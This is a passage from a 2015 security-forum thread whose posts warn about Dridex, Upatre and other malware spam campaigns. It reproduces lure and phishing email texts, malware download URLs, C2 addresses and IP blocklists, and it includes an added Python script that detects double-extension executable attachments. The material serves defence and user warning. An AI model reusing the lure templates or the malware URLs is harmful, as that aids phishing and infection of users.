    Current Virus total detections: 1/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1434373340/

    Last edited by AplusWebMaster; 2015-06-15 at 18:00.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #727 AplusWebMaster (Adviser Team)

    Fake 'Travel order', 'Invoice', 'Internet Invoice' SPAM, More Malvertising

    FYI...

    Magnitude Exploit Kit uses Newly Patched Adobe Vuln ...
    - http://blog.trendmicro.com/trendlabs...-most-at-risk/
    Jun 16, 2015 - "Adobe may have already patched a Flash Player vulnerability last week, but several users — especially those in the US, Canada, and the UK — are still currently exposed and are at risk of getting infected with CryptoWall 3.0. The Magnitude Exploit Kit included an exploit, detected as SWF_EXPLOIT.MJTE, for the said vulnerability, allowing attackers to spread crypto-ransomware into their target systems. We first saw signs of this activity yesterday, June 15... Adobe’s regular June Update for Adobe Flash Player... upgraded the software to version 18.0.0.160*. However, many users are still running the previous version (17.0.0.188), which means that a lot of users are still at risk... cybercriminals rapidly take advantage of recently-patched vulnerabilities through exploit kits. We saw a similar incident in March, where exploits for an Adobe Flash Player vulnerability were added to the Nuclear Exploit Kit just a week after the patch was released. We also noted earlier this month that Flash Player was being targeted more frequently by exploit kits, and that shows no sign of changing soon..."
    * https://www.adobe.com/products/flash...ribution3.html
    ___

    Fake 'Travel order' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/the-ca...sheet-malware/
    16 Jun 2015 - "'Travel order confirmation 0300202959' pretending to come from overseastravel@ caravanclub .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
    Dear customer,
    Thank you for your travel order.
    Please find attached your booking confirmation which you should take with you on your trip. Please note we no longer send tickets for overseas travel bookings.
    Your booking confirmation document is stored as a DOC file which requires the use of Microsoft Word software to view it.
    Yours sincerely
    The Caravan Club
    This email is sent from the offices of The Caravan Club, a company limited by guarantee (Company Number: 00646027). The registered office is East Grinstead House, London Road, East Grinstead, West Sussex, RH19 1UA.
    Regulation The Caravan Club Ltd is authorised and regulated by the Financial Conduct Authority. FCA registration number is 311890
    This email is sent from the offices of The Caravan Club Limited...


    16 June 2015: Travel Order Confirmation – 0300202959.doc
    Current Virus total detections: 4/57* ... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**). Note: there are normally 5 or 6 other download locations but all will lead to the same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1434440780/

    ** https://www.virustotal.com/en-gb/fil...is/1434441238/
    ... Behavioural information
    TCP connections
    37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
    88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

    aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-...8/information/
    ___

    Fake 'Invoice' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/carol-...sheet-malware/
    16 Jun 2016 - "'Invoice' pretending to come from Carol Young <carol@ baguette-express. co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
    Invoice Attached
    Carol Young
    Accounts Manager
    Office:0845 070 4360
    Email: carol@ baguette-express .co.uk
    Web: www .baguette-express .co.uk
    1 Cranston Crescent
    Lauder
    Borders
    TD2 6UB


    16 June 2015: A4 Inv_Crd Unit Price, With Discount.doc - Current Virus total detections: 4/57*
    ... downloads Dridex banking malware from dubrovnik-marryme .com/90/72.exe (VirusTotal**) This is the -same- malware payload as described in today’s other malspam word macro malware 'The caravan Club Travel order confirmation 0300202959'*** – word doc or excel xls spreadsheet malware..."
    * https://www.virustotal.com/en-gb/fil...is/1434441322/

    ** https://www.virustotal.com/en-gb/fil...is/1434441238/
    ... Behavioural information
    TCP connections
    37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
    88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

    *** http://myonlinesecurity.co.uk/the-ca...sheet-malware/

    dubrovnik-marryme .com: 188.40.57.166: https://www.virustotal.com/en-gb/ip-...6/information/
    ___

    Fake 'Invoice copy' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/gary-a...sheet-malware/
    16 Jun 2015 - "'Invoice copy no. 252576' pretending to come from kathy@ almondscateringsupplies .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
    Please find attached DOC document with invoice copy no. 252576
    Kind regards,
    Gary Almond


    16 June 2015 : DespatchNote_-_252576_160615_063107663.doc - Current Virus total detections: 4/57*
    ... downloads Dridex banking malware from aspectaceindia .in/90/72.exe (VirusTotal**)
    Note: there are normally 5 or 6 other download locations but all will lead to the same Dridex banking malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1434440780/

    ** https://www.virustotal.com/en-gb/fil...is/1434441238/
    ... Behavioural information
    TCP connections
    37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
    88.221.15.80: https://www.virustotal.com/en-gb/ip-...0/information/

    aspectaceindia .in: 203.124.96.148: https://www.virustotal.com/en-gb/ip-...8/information/
    ___

    Fake 'Internet Invoice' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/eclips...sheet-malware/
    16 Jun 2015 - "'Eclipse Internet Invoice is available online – 36889843EC' pretending to come from customer@ eclipse .net.uk with a malicious word doc called EC_36889843_88113463.doc is another one from the current bot runs... The email looks like:
    Dear Customer,
    Thank you for choosing to receive your invoice by email. Please find this attached.
    If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password... Alternatively, you can contact our Customer Service Team, Monday to Friday 8am – 6pm, on the telephone number published...
    Kind regards
    Eclipse Internet


    The number in the subject, which is random, -matches- the word attachment name, so everybody gets a differently named email and attachment. The malicious macro and the downloaded Dridex banking malware are exactly the -same- as described in today’s earlier other word macro malspam runs:

    1]'Gary Almond almondscateringsupplies .co.uk Invoice copy no. 252576 – word doc or excel xls spreadsheet malware':
    - http://myonlinesecurity.co.uk/gary-a...sheet-malware/

    2]'Carol Young baguette-express Invoice – word doc or excel xls spreadsheet malware':
    - http://myonlinesecurity.co.uk/carol-...sheet-malware/

    3]'The caravan Club Travel order confirmation 0300202959 – word doc or excel xls spreadsheet malware':
    - http://myonlinesecurity.co.uk/the-ca...sheet-malware/
    The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
    ___

    Trojan uses steganography to hide itself in image files
    - http://net-security.org/malware_news.php?id=3058
    16.06.2015 - "The Dell SecureWorks* CTU research team has recently analyzed a piece of malware that uses digital steganography to hide part of its malicious code. Stegoloader, as they dubbed it, is not technically new. Previous versions of the malware have been spotted in 2013 and 2014, bundled with tools used to crack or generate software keys... Stegoloader's main reason for being is to steal information from users, but it has a modular design, and the researchers themselves say that they might not have yet seen and analyzed all of its modules... Stegoloader is not the first malware to use steganography to hide malicious code or information such as the address of the malware's backup C&C, but the researchers note that it could represent an emerging trend in malware... researcher Saumil Shah recently demonstrated at the Hack in the Box conference**, it's possible to insert both malicious code and exploit code that will trigger it into an image, and this type of delivery mechanism is still undetectable by current defensive solutions."
    * http://www.secureworks.com/cyber-thr...ation-stealer/

    ** http://www.net-security.org/secworld.php?id=18443
    ___

    Dutch Users: victims of Large Malvertising Campaign
    - https://blog.malwarebytes.org/malver...sing-campaign/
    June 15, 2015 - "Security firm Fox-IT* has identified a large malvertising campaign that began affecting Dutch users on June 11:
    * http://blog.fox-it.com/2015/06/15/la...e-netherlands/
    In their blog post, they say that several major news sites were loading the -bogus- advertisement that ultimately led to the Angler exploit kit. Looking at our telemetry we also noticed this attack, and in particular on Dutch news site Telegraaf[.]nl via an advert from otsmarketing .com, which according to Fox-IT is -more- than a suspicious ad network:
    > https://blog.malwarebytes.org/wp-con...06/diagram.png
    The ad silently loaded a Google shortened URL used to -redirect- to the exploit kit... This latest malvertising case illustrates the efficacy of leveraging ad networks to selectively infect end users while also demonstrating that there is a clear problem with identifying rogue advertisers. As stated by Fox-IT, the company responsible for the malvertising was not 'loaded via advertisements until Thursday last week, the first day we’ve seen this malvertising campaign in action'. This leaves some serious questions about the additional scrutiny in place for new advertisers and how it made it through security checks."

    107.181.187.81: https://www.virustotal.com/en-gb/ip-...1/information/

    Last edited by AplusWebMaster; 2015-06-16 at 23:19.

  8. #728 AplusWebMaster (Adviser Team)

    Fake 'PayPal Receipt' SPAM, Tax Refund PHISH

    FYI...

    Fake 'PayPal Receipt' SPAM - PDF malware
    - http://myonlinesecurity.co.uk/paypal...e-pdf-malware/
    17 June 2015 - "'Receipt for Your Payment to OMER SALIM' pretending to come from service@ intl .paypal .com with a zip attachment is another one from the current bot runs...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...OMER-SALIM.png

    17 June 2015: Receipt99704.zip: Extracts to: Receipt99704.PDF.exe
    Current Virus total detections: 10/57*. This is another one of the spoofed icon files that, unless you have 'show known file extensions' enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en-gb/fil...is/1434488522/
    ___

    Fake 'Refunds for overpaid taxes' – Phish ...
    - http://myonlinesecurity.co.uk/hmrc-r...axes-phishing/
    17 June 2015 - "'Refunds for overpaid property taxes' pretending to come from HM Revenue & Customs <ecustomer.support@ hmrc .gateway .gov.uk> is an email pretending to come from HM Revenue & Customs... This one wants your personal details and your bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... This particular email has a zip attachment that when unzipped has an html webpage that asks you to fill in bank details. If you open the html attachment you see a webpage looking like this where they want your bank details, name and birth date:

    Phish Screenshot: http://myonlinesecurity.co.uk/wp-con...erty-taxes.png

    All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” that appears to come from a friend, or one more targeted at somebody who is likely to regularly receive PDF attachments or Word .doc attachments or any other common file that you use every day, or whether it is a straightforward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
    ___

    Fake 'Document Service' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/docume...sheet-malware/
    17 June 2015 - "'Document Service, Order Id: 14262781' pretending to come from ICC <orders@ icc .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...e-Order-Id.png

    17 June 2015: 14262781_FMM_751061928.doc - Current Virus total detections: 4/57*
    The malicious macro in this particular word doc downloads Dridex banking malware from http ://cheshiregunroom .com/23/07.exe. There are normally between 5 and 10 other download sites, all giving the same Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1434529913/

    ** https://www.virustotal.com/en-gb/fil...is/1434531876/
    ... Behavioural information
    TCP connections
    37.143.11.165: https://www.virustotal.com/en-gb/ip-...5/information/
    88.221.14.249: https://www.virustotal.com/en-gb/ip-...9/information/

    cheshiregunroom .com: 92.63.140.197: https://www.virustotal.com/en-gb/ip-...7/information/
    ___

    Fake 'Message from KMBT' SPAM - doc/xls malware
    - http://myonlinesecurity.co.uk/messag...sheet-malware/
    17 Jun 2015 - "'Message from KMBT_C280' pretending to come from scanner@ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email comes in with a completely -empty- body and just the subject line of Message from KMBT_C280.

    17 June 2015 : SKMBT_C28015061614410.doc - Current Virus total detections: 4/57*
    This particular malicious macro downloads Dridex banking malware from http ://businesssupportsoutheastlondon .co.uk/23/07.exe which is the -same- as described in today’s other malspam word doc campaign Document Service, Order Id: 14262781** - LE BISTROT PIERRE LIMITED – ICC – word doc or excel xls spreadsheet malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en-gb/fil...is/1434531806/

    ** http://myonlinesecurity.co.uk/docume...sheet-malware/

    businesssupportsoutheastlondon .co.uk: 88.208.248.144: https://www.virustotal.com/en-gb/ip-...4/information/
    ___

    Botnet-based malicious SPAM seen this week
    - https://isc.sans.edu/diary.html?storyid=19807
    2015-06-17 - "Botnets continually send out malicious spam (malspam). As mentioned in previous diaries, we see botnet-based malspam delivering Dridex and Dyre malware almost every day [1, 2]. Recently, someone sent us a malicious Word document from what appeared to be Dridex malspam on Tuesday 2015-06-16... Unfortunately, while investigating the malware, I could not generate the full range of infection traffic. Otherwise, the traffic follows the same general patterns we've previously seen with Dridex [1]... Dridex has been using Microsoft Word documents and Excel spreadsheets designed to infect a computer if macros are enabled, which matches the infection vector used by this malspam... Macros are -not- enabled in the default installation for Microsoft Office. To infect a computer, most people will have to -enable- macros after the document is opened, as shown below:
    > https://isc.sans.edu/diaryimages/ima...y-image-04.jpg
    ...
    > https://isc.sans.edu/diaryimages/ima...y-image-05.jpg ..."

    1] https://isc.sans.edu/diary/Recent+Dridex+activity/19687

    2] https://isc.sans.edu/diary/UpatreDyr...+malspam/19657

    Last edited by AplusWebMaster; 2015-06-17 at 19:34.

  9. #729 AplusWebMaster (Adviser Team)

    Fake 'Bank query alert', 'CVD Insurance', 'Transfer', 'banking invoice' SPAM

    FYI...

    Fake email “Bank query alert” contains trojan
    - http://blog.mxlab.eu/2015/06/18/fake...ntains-trojan/
    June 18, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Bank query alert”. This email is sent from spoofed email addresses and has the following body:
    Good day!
    Please note that we have received the bank query from Your bank regarding the current account.
    You are asked to fill the appropriate bank form, which is enclosed below, until 20th day of
    June in order to avoid the security hold of the account. Please also confirm the following
    account No.: 9042 5736 6695 0412. After filling the document please send us the scan-copy
    so that we could duly forward it to the bank manager. If you have any questions feel
    free to contact us on: 677-77-90.
    Thanks in advance.
    Best regards, Michael Forester Managing Partner


    The attached file Michael.zip contains the 46 kB large file Transfer_blocked.exe. The trojan is known as Trojan.Win32.Generic.pak!cobra, Gen:Variant.Graftor.198120, Trojan.Win32.YY.Gen.4, LooksLike.Win32.Upatre.g (v) or Downloader.Upatre!gen9. At the time of writing, 7 of the 57 AV engines did detect the trojan at Virus Total*..."
    * https://www.virustotal.com/en/file/a...11da/analysis/
    ... Behavioural information
    TCP connections
    64.182.208.183: https://www.virustotal.com/en/ip-add...3/information/
    93.93.194.202: https://www.virustotal.com/en/ip-add...2/information/
    173.248.29.43: https://www.virustotal.com/en/ip-add...3/information/
    88.221.15.80: https://www.virustotal.com/en/ip-add...0/information/
    ___

    Fake 'CVD Insurance' SPAM – doc/xls malware
    - http://myonlinesecurity.co.uk/cvd-in...sheet-malware/
    18 Jun 2015 - "'CVD Insurance – documents attached' pretending to come from Lowri Duffield <lowri.duffield@ brightsidegroup .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...s-attached.png

    18 June 2015: 3098_001.doc - Current Virus total detections: 4/57*
    ... downloads Dridex banking malware from http ://evolutionfoundationcollege .co.uk/66/71.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/5...is/1434619773/

    ** https://www.virustotal.com/en/file/1...is/1434619280/

    evolutionfoundationcollege .co.uk: 188.121.55.128: https://www.virustotal.com/en/ip-add...8/information/
    ___

    Fake 'Transfer to your account blocked' SPAM – PDF malware
    - http://myonlinesecurity.co.uk/transf...e-pdf-malware/
    18 Jun 2015 - "'Transfer to your account blocked' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email which has random ID numbers that -match- the attachment name looks like:

    Transfer has been blocked, details in an attachment.
    ID Transfer: 96907740967
    Date of formation: Thu, 18 Jun 2015 13:35:45 +0100


    18 June 2015: id96907740967_Transfer_details.zip: Extracts to: Transfer_blocked.exe
    Current Virus total detections: 3/57*. This is another one of the spoofed icon files that, unless you have 'show known file extensions' enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/f...is/1434629016/
    ___

    Fake 'banking invoice' SPAM - leads to malware
    - http://blog.dynamoo.com/2015/06/malw...onica-cod.html
    18 Jun 2015 - "This Portuguese-language spam pretends to be some sort of banking invoice, but instead leads to malware hosted on Google Drive. The target appears to be users in Brazil.

    From: sac.contact4e74974737@ bol .com.br
    To: mariomarinho@ uol .com.br
    Date: 18 June 2015 at 08:46
    Subject: NOTA FISCAL ELETRÔNICA COD. 6Uhrae.088693
    Signed by: bol .com.br ...


    The reference numbers and sender change slightly in each version. I've seen three samples before, each one with a different download location... which leads to a ZIP file named NFe_0185189710250029301785.zip which in turn contains a malicious executable NFe_0185189710250029301785.exe which has a VirusTotal detection rate of 8/57*. Comments in that report indicate that this may be the Spy.Banker trojan. The Malwr report indicates that it downloads components from the following locations:
    http ://donwup2015 .com.br/arq/point.php
    http ://tynly2015 .com.br/upt/ext.zlib
    ... These sites are hosted on:
    108.167.188.249 (WebsiteWelcome, US)
    187.17.111.104 (Universo Online, Brazil)
    The VirusTotal report for both these IPs [1] [2] indicates a high level of badness, indicating that they should be -blocked-. Furthermore, Malwr shows that it drops a file with a detection rate of 2/57**...
    Recommended blocklist:
    108.167.188.249
    187.17.111.104
    ..."
    * https://www.virustotal.com/en/file/2...is/1434618710/
    ... Behavioural information
    TCP connections
    1] 108.167.188.249: https://www.virustotal.com/en/ip-add...9/information/

    2] 187.17.111.104: https://www.virustotal.com/en/ip-add...4/information/

    ** https://www.virustotal.com/en/file/e...is/1434619879/

    Last edited by AplusWebMaster; 2015-06-18 at 19:14.
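The 'spoofed icon' trick that posts #726, #728 and #729 above keep warning about (an executable named Receipt99704.PDF.exe so that it displays as a PDF when known extensions are hidden, or a zip that 'extracts to' an .exe) can be screened for mechanically on the mail gateway or in a triage script. The following Python is an added example, not code from this thread or from myonlinesecurity.co.uk; it uses only the standard library, the attachment names are the ones quoted in the posts, and the zip archive is constructed in memory.

```python
# Added example (not code from the forum thread or the quoted blogs): flags the
# "spoofed icon" attachment trick the posts describe, where an executable is
# named like Receipt99704.PDF.exe so that, with known file extensions hidden,
# it shows as a PDF, and where a zip "extracts to" an .exe. Sample names are
# the ones quoted in the posts; the zip archive is constructed in memory.
import io
import os
import zipfile

# Extensions Windows will run directly; .exe is the one the posts report.
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "jse", "wsf"}
# Extensions a user expects to be harmless documents or images.
DECOY_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "jpeg", "png"}


def classify_name(name: str) -> str:
    """Return 'double-extension', 'executable' or 'ok' for one file name."""
    base = os.path.basename(name.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2:
        return "ok"                      # no extension at all
    if parts[-1] not in EXECUTABLE_EXT:
        return "ok"                      # documents, archives, images
    # Executable whose *visible* name (last extension hidden) ends in a decoy
    # extension, e.g. Receipt99704.PDF.exe displayed as Receipt99704.PDF.
    if len(parts) >= 3 and parts[-2] in DECOY_EXT:
        return "double-extension"
    return "executable"


def suspicious_zip_members(zip_bytes: bytes) -> list:
    """List members of a zip attachment that are executables (either kind)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if classify_name(info.filename) != "ok":
                found.append(info.filename)
    return found


def build_sample_zip(member_names) -> bytes:
    """Construct an in-memory zip with empty members (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for m in member_names:
            zf.writestr(m, b"")
    return buf.getvalue()


# Attachment names quoted in the posts above, plus a benign-looking one.
SAMPLE_NAMES = [
    "Receipt99704.PDF.exe",     # Fake 'PayPal Receipt'
    "New_docs.exe",             # Fake 'Notice DHL'
    "Transfer_blocked.exe",     # Fake 'Transfer to your account blocked'
    "3098_001.doc",             # macro doc: not caught by this name check
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        print(f"{n:28s} {classify_name(n)}")
    sample = build_sample_zip(["readme.txt", "Receipt99704.PDF.exe"])
    print("zip flags:", suspicious_zip_members(sample))
```

The name check does nothing for the macro-bearing .doc/.xls attachments in the same posts; those need macro inspection or the "never open unexpected attachments" rule the blogs repeat.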

  10. #730 AplusWebMaster (Adviser Team)

    Fake 'New instructions' SPAM

    FYI...

    Fake 'New instructions' SPAM - malicious payload
    - http://blog.dynamoo.com/2015/06/malw...tructions.html
    19 June 2015 - "This rather terse spam comes with a malicious payload:
    From: tim [tim@ thramb .com]
    Date: 19 June 2015 at 16:40
    Subject: New instructions
    New instructions payment of US banks, ask to read


    Attached is an archive file with the somewhat unusual name of instructions.zip size=19811 which contains a malicious executable named instructions_document.exe. The VirusTotal analysis indicates that this is the Upatre download [detection rate 3/57*]. Automated analysis tools... show traffic to: 93.93.194.202 :13222/C21/UEQUILABOOMBOOM/0/51-SP3/0/MEBEFEBLGBEID ... which is an IP operated by Orion Telekom in Serbia, and also 66.196.63.33 :443 which is Hamilton Telecommunications in the US. A characteristic of this generation of Upatre is that it sends traffic to icanhazip.com which while not malicious in itself is quite a good indicator of infection. In all cases I have seen, Upatre drops the Dyre banking trojan, but I have been unable to obtain a sample.
    Recommended blocklist:
    93.93.194.202
    66.196.63.33
    "
    * https://www.virustotal.com/en/file/6...is/1434725207/
    ... Behavioural information
    TCP connections
    104.238.141.75: https://www.virustotal.com/en/ip-add...5/information/
    93.93.194.202: https://www.virustotal.com/en/ip-add...2/information/
    66.196.63.33: https://www.virustotal.com/en/ip-add...3/information/
    88.221.14.249: https://www.virustotal.com/en/ip-add...9/information/

    Last edited by AplusWebMaster; 2015-06-19 at 17:40.
